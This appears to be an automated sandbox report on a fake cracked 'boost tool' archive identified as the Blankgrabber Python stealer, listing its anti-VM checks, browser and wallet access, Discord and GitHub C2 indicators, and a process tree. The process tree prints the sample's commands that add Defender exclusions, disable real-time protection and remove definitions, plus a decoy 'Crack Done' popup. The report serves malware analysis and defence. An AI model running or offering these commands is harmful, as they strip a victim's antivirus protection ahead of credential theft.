Analysis Overview
SHA256
a87cd76b25f1927111bb0d8c81585861dc614dbb84612351b2d909aa5dd97f63
Threat Level: Known bad
The file boostup_boost_tool_cracked.zip was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Loads dropped DLL
UPX packed file
Executes dropped EXE
Themida packer
Checks BIOS information in registry
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Checks whether UAC is enabled
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Enumerates processes with tasklist
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Gathers system information
Detects videocard installed
Enumerates system info in registry
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies registry class
Modifies Internet Explorer settings
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-20 00:51
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-20 00:50
Reported
2024-06-20 01:01
Platform
win10v2004-20240611-ja
Max time kernel
599s
Max time network
602s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\onefile_2392_133633185665298936\main.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\onefile_3100_133633185880235060\main.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\onefile_5868_133633184564038664\main.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\onefile_4224_133633185526924651\main.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\onefile_3364_133633183691898583\main.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
Command and Scripting Interpreter: PowerShell
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\onefile_5868_133633184564038664\main.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\onefile_2392_133633185665298936\main.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\onefile_4224_133633185526924651\main.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\onefile_3100_133633185880235060\main.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\onefile_3364_133633183691898583\main.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\onefile_3364_133633183691898583\main.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\onefile_5868_133633184564038664\main.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\onefile_2392_133633185665298936\main.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\onefile_4224_133633185526924651\main.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\onefile_3100_133633185880235060\main.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\onefile_3100_133633185880235060\main.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\onefile_5868_133633184564038664\main.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\onefile_4224_133633185526924651\main.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\onefile_2392_133633185665298936\main.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\onefile_3364_133633183691898583\main.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api64.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api64.ipify.org | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Software\Microsoft\Internet Explorer\International\CpMRU | C:\Windows\system32\mshta.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" | C:\Windows\system32\mshta.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Size = "10" | C:\Windows\system32\mshta.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" | C:\Windows\system32\mshta.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" | C:\Windows\system32\mshta.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\mshta.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000002000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\mshta.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\mshta.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133633187146646355" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2447855248-390457009-3660902674-1000\{80CBE9EF-37BD-431D-A2DD-9BCC00387427} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\boostup_boost_tool_cracked\loader.exe
"C:\Users\Admin\Desktop\boostup_boost_tool_cracked\loader.exe"
C:\Users\Admin\Desktop\boostup_boost_tool_cracked\loader.exe
"C:\Users\Admin\Desktop\boostup_boost_tool_cracked\loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\boostup_boost_tool_cracked\loader.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\boostup_boost_tool_cracked\loader.exe'
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
